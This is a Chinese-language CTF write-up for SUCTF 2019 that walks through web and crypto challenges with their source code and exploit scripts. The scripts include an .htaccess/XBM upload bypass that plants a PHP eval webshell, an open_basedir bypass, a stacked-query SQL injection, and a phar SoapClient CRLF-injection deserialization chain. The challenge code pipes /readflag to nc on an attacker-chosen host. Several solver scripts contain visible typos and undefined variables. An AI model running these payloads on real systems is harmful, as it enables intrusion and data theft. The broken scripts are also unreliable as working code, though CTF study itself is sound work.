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<?php function get_the_flag () { $userdir = "upload/tmp_" .md5($_SERVER['REMOTE_ADDR' ]); if (!file_exists($userdir)){ mkdir($userdir); } if (!empty ($_FILES["file" ])){ $tmp_name = $_FILES["file" ]["tmp_name" ]; $name = $_FILES["file" ]["name" ]; $extension = substr($name, strrpos($name,"." )+1 ); if (preg_match("/ph/i" ,$extension)) die ("^_^" ); if (mb_strpos(file_get_contents($tmp_name), '<?' )!==False ) die ("^_^" ); if (!exif_imagetype($tmp_name)) die ("^_^" ); $path= $userdir."/" .$name; @move_uploaded_file($tmp_name, $path); print_r($path); } } $hhh = @$_GET['_' ]; if (!$hhh){ highlight_file(__FILE__ ); } if (strlen($hhh)>18 ){ die ('One inch long, one inch strong!' ); } if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i' , $hhh) ) die ('Try something else!' ); $character_type = count_chars($hhh, 3 ); if (strlen($character_type)>12 ) die ("Almost there!" );eval ($hhh);?>
可以看到这题有两个考点,一个是bypass执行eval,另一个是文件上传 第一步的过滤很严,能用的字符不多,函数更是不能用了Orz 后面的文件上传也很严格,文件后缀不能有ph,文件内容不能有<?
,文件类型要符合exif_imagetype 先看第一步,剩下的可见字符能入手的估计也就是~
,异或想去利用,一个字符至少得用六个字符去表示,加起来肯定是不够的,函数就更加执行不了了 然后参考微笑师傅的博客,思路清奇 所以接下来考虑变量,因为还有$
,估计能18位搞定Orz 一波操作以后能构造出
1 2
无参的函数不多,因此第二步的利用就是要用他给的get_the_flag函数了 第二步的考点估计后缀过滤得那么死,环境还是php7.2,估计得.htaccess
,因此我们去找一下有没有什么图片头是有这些符号的 然后这里有个xbm图片,格式如下
1 2 3 4 5
#define test_width 16 #define test_height 7 static char test_bits[] = { 0x13, 0x00, 0x15, 0x00, 0x93, 0xcd, 0x55, 0xa5, 0x93, 0xc5, 0x00, 0x80, 0x00, 0x60 };
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# define width 1337 # define height 1337 AddType application/x-httpd-php .aaa # Say all file with extension .php16 will execute php php_value zend.multibyte 1 # Active specific encoding (you will see why after :D) php_value zend.detect_unicode 1 # Detect if the file have unicode content php_value display_errors 1 # Display php errors
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SIZE_HEADER = b'\n\n#define width 1337\n#define height 1337\n\n' def generate_php_file (filename, script) : phpfile = open(filename, 'wb' ) phpfile.write(script.encode('utf-16be' )) phpfile.write(SIZE_HEADER) phpfile.close() def generate_htaccess () : htaccess = open('..htaccess' , 'wb' ) htaccess.write(SIZE_HEADER) htaccess.write(b'AddType application/x-httpd-php .aaa\n' ) htaccess.write(b'php_value zend.multibyte 1\n' ) htaccess.write(b'php_value zend.detect_unicode 1\n' ) htaccess.write(b'php_value display_errors 1\n' ) htaccess.close() generate_htaccess() generate_php_file("eval.aaa" , "<?php eval($_GET['cmd']); ?>" )
上传过去又遇到open_basedir bypass,经典的bypass
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<?php mkdir('/tmp/aaa/' ); chdir('/tmp/aaa/' ); ini_set('open_basedir' . '..' ); chdir('..' ); chdir('..' ); chdir('..' ); ini_set('open_basedir' ,'/' ); var_dump(file_get_contents('/flag' ));
这道题菜鸡的解法是非预期…….. 因为运维人员在线vim的时候源码被我们扫到了,所以………
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if (isset ($post['query' ])){ $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"" ; if (preg_match("/{$BlackList}/is" ,$post['query' ])){ die ("Nonono." ); } if (strlen($post['query' ])>40 ){ die ("Too long." ); } $sql = "select " .$post['query' ]."||flag from Flag" ; mysqli_multi_query($MysqlLink,$sql); do { if ($res = mysqli_store_result($MysqlLink)){ while ($row = mysqli_fetch_row($res)){ print_r($row); } } }while (@mysqli_next_result($MysqlLink)); }
然后看着源码做题很舒服Orz……(逃 官方正解是
1; set sql_mode=pipes_as_concat; select 1
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@app.route('/getUrl', methods=['GET', 'POST']) def getUrl () : url = request.args.get("url" ) host = parse.urlparse(url).hostname if host == 'suctf.cc' : return "我扌 your problem? 111" parts = list(urlsplit(url)) host = parts[1 ] if host == 'suctf.cc' : return "我扌 your problem? 222 " + host newhost = [] for h in host.split('.' ): newhost.append(h.encode('idna' ).decode('utf-8' )) parts[1 ] = '.' .join(newhost) finalUrl = urlunsplit(parts).split(' ' )[0 ] host = parse.urlparse(finalUrl).hostname if host == 'suctf.cc' : return urllib.request.urlopen(finalUrl).read() else : return "我扌 your problem? 333"
然后就是利用了,因为题目提示nginx,所以直接读配置文件找flag 赛后才知道是今年blackhat提到的,还是tcl 顺便贴一个nginx配置目录 ,溜了
Upload Labs 2
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include 'class.php' ;$userdir = "upload/" . md5($_SERVER["REMOTE_ADDR" ]); if (!file_exists($userdir)) { mkdir($userdir, 0777 , true ); } if (isset ($_POST["upload" ])) { $allowedExts = array ("gif" , "jpeg" , "jpg" , "png" ); $tmp_name = $_FILES["file" ]["tmp_name" ]; $file_name = $_FILES["file" ]["name" ]; $temp = explode("." , $file_name); $extension = end($temp); if ((($_FILES["file" ]["type" ] == "image/gif" ) || ($_FILES["file" ]["type" ] == "image/jpeg" ) || ($_FILES["file" ]["type" ] == "image/png" )) && ($_FILES["file" ]["size" ] < 204800 ) && in_array($extension, $allowedExts) ) { $c = new Check($tmp_name); $c->check(); if ($_FILES["file" ]["error" ] > 0 ) { echo "错误:: " . $_FILES["file" ]["error" ] . "<br>" ; die (); } else { move_uploaded_file($tmp_name, $userdir . "/" . md5($file_name) . "." . $extension); echo "文件存储在: " . $userdir . "/" . md5($file_name) . "." . $extension; } } else { echo "非法的文件格式" ; } } include 'class.php' ;if (isset ($_POST["submit" ]) && isset ($_POST["url" ])) { if (preg_match('/^(ftp|zlib|data|glob|phar|ssh2|compress.bzip2|compress.zlib|rar|ogg|expect)(.|\\s)*|(.|\\s)*(file|data|\.\.)(.|\\s)*/i' ,$_POST['url' ])){ die ("Go away!" ); }else { $file_path = $_POST['url' ]; $file = new File($file_path); $file->getMIME(); echo "<p>Your file type is '$file' </p>" ; } } include 'config.php' ;class File { public $file_name; public $type; public $func = "Check" ; function __construct ($file_name) { $this ->file_name = $file_name; } function __wakeup () { $class = new ReflectionClass($this ->func); $a = $class->newInstanceArgs($this ->file_name); $a->check(); } function getMIME () { $finfo = finfo_open(FILEINFO_MIME_TYPE); $this ->type = finfo_file($finfo, $this ->file_name); finfo_close($finfo); } function __toString () { return $this ->type; } } class Check { public $file_name; function __construct ($file_name) { $this ->file_name = $file_name; } function check () { $data = file_get_contents($this ->file_name); if (mb_strpos($data, "<?" ) !== FALSE ) { die ("<? in contents!" ); } } } include 'config.php' ;class Ad { public $ip; public $port; public $clazz; public $func1; public $func2; public $func3; public $instance; public $arg1; public $arg2; public $arg3; function __construct ($ip, $port, $clazz, $func1, $func2, $func3, $arg1, $arg2, $arg3) { $this ->ip = $ip; $this ->port = $port; $this ->clazz = $clazz; $this ->func1 = $func1; $this ->func2 = $func2; $this ->func3 = $func3; $this ->arg1 = $arg1; $this ->arg2 = $arg2; $this ->arg3 = $arg3; } function check () { $reflect = new ReflectionClass($this ->clazz); $this ->instance = $reflect->newInstanceArgs(); $reflectionMethod = new ReflectionMethod($this ->clazz, $this ->func1); $reflectionMethod->invoke($this ->instance, $this ->arg1); $reflectionMethod = new ReflectionMethod($this ->clazz, $this ->func2); $reflectionMethod->invoke($this ->instance, $this ->arg2[0 ], $this ->arg2[1 ], $this ->arg2[2 ], $this ->arg2[3 ], $this ->arg2[4 ]); $reflectionMethod = new ReflectionMethod($this ->clazz, $this ->func3); $reflectionMethod->invoke($this ->instance, $this ->arg3); } function __wakeup () { system("/readflag | nc $this->ip $this->port" ); } } if ($_SERVER['REMOTE_ADDR' ] == '' ){ if (isset ($_POST['admin' ])){ $ip = $_POST['ip' ]; $port = $_POST['port' ]; $clazz = $_POST['clazz' ]; $func1 = $_POST['func1' ]; $func2 = $_POST['func2' ]; $func3 = $_POST['func3' ]; $arg1 = $_POST['arg1' ]; $arg2 = $_POST['arg2' ]; $arg2 = $_POST['arg3' ]; $admin = new Ad($ip, $port, $clazz, $func1, $func2, $func3, $arg1, $arg2, $arg3); $admin->check(); } } else { echo "You r not admin!" ; }
,这步参考了delta的wp 最后的问题,phar怎么触发呢,这里就是考的就是phar stream wrapper,File类的finfo_open与phar
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<?php class File { public $file_name; public $type; public $func = 'SoapClient' ; function __wakeup () { $class = new ReflectionClass($this ->func); $a = $class->newInstanceArgs($this ->file_name); $a -> check(); } function __construct () { $target = '' ; $post_string = 'admin=&ip=x&port=x&clazz=SplStack&func1=push&func2=push&func3=push&arg1=123&arg2=123&arg3=' ; $this ->file_name = [null , array ("location" => $target, "user_agent" => "exp\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: profile=1\r\nContent-Length: " .(string)strlen($post_string)."\r\n\r\n" .$post_string,"uri" => "" )]; } } file_put_contents("test.txt" , "test" ); $e = new File(); unlink("phar.phar" ); $phar = new Phar("phar.phar" ); $phar->startBuffering(); $phar->setStub('<script language="php">__HALT_COMPILER();</script>' ); $phar->setMetadata($e); $phar->addFromString("test.txt" , "test" ); $phar->stopBuffering(); rename("phar.phar" , "phar.png" ); unlink("test.txt" );
这题出题人的思路也很巧妙,后面触发部分考察的是mysql client attack,而mysql在执行real_connect的时候会覆盖前面的mysqli->options
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$m = new mysqli(); $m->init(); $m->real_connect('ip' ,'select 1' ,'select 1' ,'select 1' ,3306 ); $m->query('select 1;' ); $reflect = new ReflectionClass('Mysqli' ); $sql = $reflect->newInstanceArgs(); $reflectionMethod = new ReflectionMethod('Mysqli' , 'init' ); $reflectionMethod->invoke($sql, $arr); $reflectionMethod = new ReflectionMethod('Mysqli' , 'real_connect' ); $reflectionMethod->invoke($sql, 'ip' ,'root' ,'123456' ,'test' ,'3306' ); $reflectionMethod = new ReflectionMethod('Mysqli' , 'query' ); $reflectionMethod->invoke($sql, 'select 1' );
mysqli->real_connect() overwrites MYSQLI_OPT_LOCAL_INFILE setting
这道题菜鸡只能跟着大佬的博客复现,还是太菜了(捂脸 首先下下来一个压缩包,进入resources目录去解压app.asar文件(很奇怪,只能解压win32的压缩包,其他全损坏 解压出来就是审计源码了,list.html里面music_info部分存在js注入 然后就是利用process进行函数劫持触发函数https://github.com/imagemlt/iCloudMusic
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import gmpy2import libnumimport hashlibimport binasciifrom Crypto.Util.number import long_to_bytesfrom pwn import *context.log_level = 'debug' p = remote("" ,"8003" ) p.recvuntil("str + " ) s = p.recv(4 ) p.recvuntil("== " ) md5s = p.recv(5 ) def md5 (str) : sha = hashlib.md5(str) e = sha.hexdigest() return e for i in range(10000000 ): if md5(str(i)+s)[0 :5 ] == md5s: p.sendline(str(i)) break p.interactive() p.recvuntil("cs[0] = " ) cs0 = int(p.recvuntil('\n' ).strip('\n' ),16 ) p.recvuntil("ns[0] = " ) ns0 = int(p.recvuntil('\n' ).strip('\n' ),16 ) p.recvuntil("cs[1] = " ) cs1 = int(p.recvuntil('\n' ).strip('\n' ),16 ) p.recvuntil("ns[1] = " ) ns1 = int(p.recvuntil('\n' ).strip('\n' ),16 ) p.recvuntil("cs[2] = " ) cs2 = int(p.recvuntil('\n' ).strip('\n' ),16 ) p.recvuntil("ns[2] = " ) ns2 = int(p.recvuntil('\n' ).strip('\n' ),16 ) p.recvuntil("cs[3] = " ) cs3 = int(p.recvuntil('\n' ).strip('\n' ),16 ) p.recvuntil("ns[3] = " ) ns3 = int(p.recvuntil('\n' ).strip('\n' ),16 ) p.recvuntil("ms[0] = " ) cs = [] ns = [] p01 = gmpy2.gcd(ns0, ns1) p02 - gmpy2.gcd(ns0, ns2) p03 = gmpy2.gcd(ns0, ns3) p04 = ns0 / p01 / p02 / p03 d0 = int(gmpy2.invert(ns0, (p01 - 1 )*(p02 - 1 )*(p03 - 1 )*(p04 - 1 ))) m1 = pow(cs0, d0, ns0) p11 = gmpy2.gcd(ns1, ns0) p12 = gmpy2.gcd(ns1, ns2) p13 = gmpy2.gcd(ns1, ns3) p14 = ns1 / p11 / p12 / p13 d1 = int(gmpy2.invert(ns1, (p11 -1 )*(p12 - 1 )*(p13 - 1 )*(p14 - 1 ))) m2 = pow(cs1, d1, ns1) p21 = gmpy2.gcd(ns2, ns0) p22 = gmpy2.gcd(ns2, ns1) p23 = gmpy2,gcd(ns2, ns3) p24 = ns2 / p20 / p21 / p22 d2 = int(gmpy2.invert(ns2, (p21 - 1 )*(p22 - 1 )*(p23 - 1 )*(p24 - 1 ))) m3 = pow(cs2, d2, ns2) p31 = gmpy2.gcd(ns3, ns0) p32 = gmpy2.gcd(ns3, ns1) p33 = gmpy2,gcd(ns3, ns2) p34 = ns3 / p30 / p31 / p32 d3 = int(gmpy2.invert(ns3, (p31 - 1 )*(p32 - 1 )*(p33 - 1 )*(p34 - 1 ))) m4 = pow(cs3, d3, nx3) p.sendline(str(hex(m1))) p.recvuntil("ms[1] = " ) p.sendline(str(hex(m2))) p.recvuntil("ms[2] = " ) p.sendline(str(hex(m3))) p.recvuntil("ms[3] = " ) p.sendline(str(hex(m4))) p.interactive()
典型的lsb oracle attack,继续贴脚本
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import requestsimport hashlibfrom pwn import *import libnumimport Cryptoimport refrom binascii import hexlify,unhexlifydef md5 (str) : sha = hashlib.md5(str) e = sha.hexdigest() return e context.log_level = 'debug' p = remote("" ,9421 ) a = p.recvuntil(")" )[-5 :-1 ] print ab = p.recvuntil("\n" )[-6 :-1 ] print bmd5s = b for i in range(10000000 ): if md5(str(i)+a)[0 :5 ] == md5s: key = i break p.recvuntil("> " ) p.sendline(str(key)) def get_m (n,c,e) : l = 0 r = n res = c e = e for i in range(20 ): print (l==r) if l == r: break p.recvuntil("Please input your option:" ) p.sendline("D" ) res = oracle(res, n, e) p.sendline(str(res)) p.recvuntil("The plain of your decrypted message is " ) judge = p.recvuntil("!" )[:-1 ] if judge == "odd" : l = (l + r) / 2 else : r = (l + r) / 2 print (l==r) return l def send_msg (c) : p.recvuntil("Please input your option:" ) p.sendline("D" ) p.sendline(str(c)) p.recvuntil("The plain of your decrypted message is " ) judge = p.recvuntil("!" )[:-1 ] if judge == "odd" : return 1 else : return 0 def lsb_attack (n, e, c) : i = 0 l, r, k = 0 , 1 , 1 while n * l // k + 1 < n * r //k: m = l + r l *= 2 r *= 2 k *= 2 if send_msg(c * pow(k, e, n) % n) == 1 : l = m else : r = m m = n * l // k if pow(m, e, n) == c: return m m = n * r // k if pow(m, e, n) == c: return m return None def test () : p.recvuntil("n = " ) n = int(p.recvline()) p.recvuntil("e = " ) e = int(p.recvline()) p.recvuntil("c = " ) c = int(p.recvline()) key = lsb_attack(n, e, c) p.recvuntil("Please input your option:" ) p.sendline("G" ) p.sendline(str(key)) for i in range(3 ): key = 0 test() p.interactive()
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from Crypto.Hash import SHAfrom Crypto.Util.number import long_to_bytesfrom pwn import *from libnum import *context.log_level = 'debug' def inv (a, b) :assert gcd(a % b, b) == 1 return xgcd(a % b, b)[0 ] % qdef decrypt (r, c1, c2, m1, m2, p, q, g, y) :ds = c2 - c1 dm = (m2 - m1) % q k = dm * inv(ds, q) % q print "[+]k------->" + str(k)tmp = k * c1 - m1 x = tmp * inv(r, q) % q assert pow(g, x, p) == yreturn xdef sig (m, x, g, p, q) :k = 151512 r = pow(g, k, p) % q c = (m + x * r) * inv(k, q) % q return (r, c)po = remote("" , "8001" ) po.recvuntil("me?" ) po.send("\n" ) po.recvuntil("p:" ) p = int(po.recvuntil("\n" ).strip("\n" )) po.recvuntil("q:" ) q = int(po.recvuntil("\n" ).strip("\n" )) po.recvuntil("g:" ) g = int(po.recvuntil("\n" ).strip("\n" )) po.recvuntil("y:" ) y = int(po.recvuntil("\n" ).strip("\n" )) md5 = [] rr = [] cc = [] def getdata () :po.recvuntil("digest:" ) m = po.recvuntil("(" )[1 :-1 ] md5.append(m) n = po.recvuntil("," )[:-2 ] rr.append(n) k = po.recvuntil(")" )[1 :-2 ] cc.append(k) print "md5--->" + mprint "rr--->" + nprint "cc--->" + kpo.recvuntil("before:" ) po.send("\n" ) for i in range(12 ):getdata() po.recvuntil("digest is:" ) l = po.recv(40 ) print "md5--->" + lprint md5print rrprint ccj = 1 for i in range(len(rr)):for j in range(j,len(rr)):if rr[i]==rr[j]:md51 = md5[i] md52 = md5[j] rr1 = rr[i] rr2 = rr[j] cc1 = cc[i] cc2 = cc[j] j = j + 1 print "md51--->" + md51print "md52--->" + md52print "rr1--->" + rr1print "rr2--->" + rr2print "cc1--->" + cc1print "cc2--->" + cc2print "md5555---->" + lx = decrypt(int(rr1), int(cc1), int(cc2), int(md51), int(md52), p, q, g, y) res = sig(int(l), x, g, p, q) print respo.interactive()
这道题是队友做出来的,tql convert函数中移位跟与运算看似不可逆,但是每一步都亦或了自己,所以是可逆的,逆回去的基本思路就是根据移位补位上去的0为已知将一个数按二进制位分块,按块求解。比如第一步 m = m ^ m >> 13 我们已知的只有亦或后的结果 往下的几步运算也一样
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num = 0xaa21f3a2 a = num >> 13 b = num >> 19 c = num & 0x1fff d = b ^c res = (a << 13 ) + d print "third" print hex(res)a = res & 0x1ffff p = 0x85d40000 b = (p & 0xfffe0000 )>>17 c = (res & 0xfffe0000 )>>17 d = (a & b) ^ c ans = (d << 17 ) + a print "second" print hex(ans)p = 0x78f39600 a = ans & 0x1ff b = (p >> 9 ) & 0x1ff c = (ans >> 9 ) & 0x1ff d = (a & b) ^ c e = (p >> 18 ) & 0x1ff f = (ans >> 18 ) & 0x1ff h = (d & e) ^ f i = h & 0x1f j = p >> 27 k = ans >> 27 l = (i & j) ^ k res = (l << 27 ) + (h << 18 ) + (d << 9 ) + a print "first" print hex(res)a = res >> 19 b = (res >> 6 ) & 0x1fff c = a ^ b d = c >> 7 e = res & 0x3f f = d ^ e ans = (a << 19 ) + (c << 6 ) + f print "flag" print hex(ans)
https://blog.zeddyu.info/2019/08/24/SUCTF-2019/ https://xz.aliyun.com/t/6042 https://www.cnblogs.com/wfzWebSecuity/p/11207145.html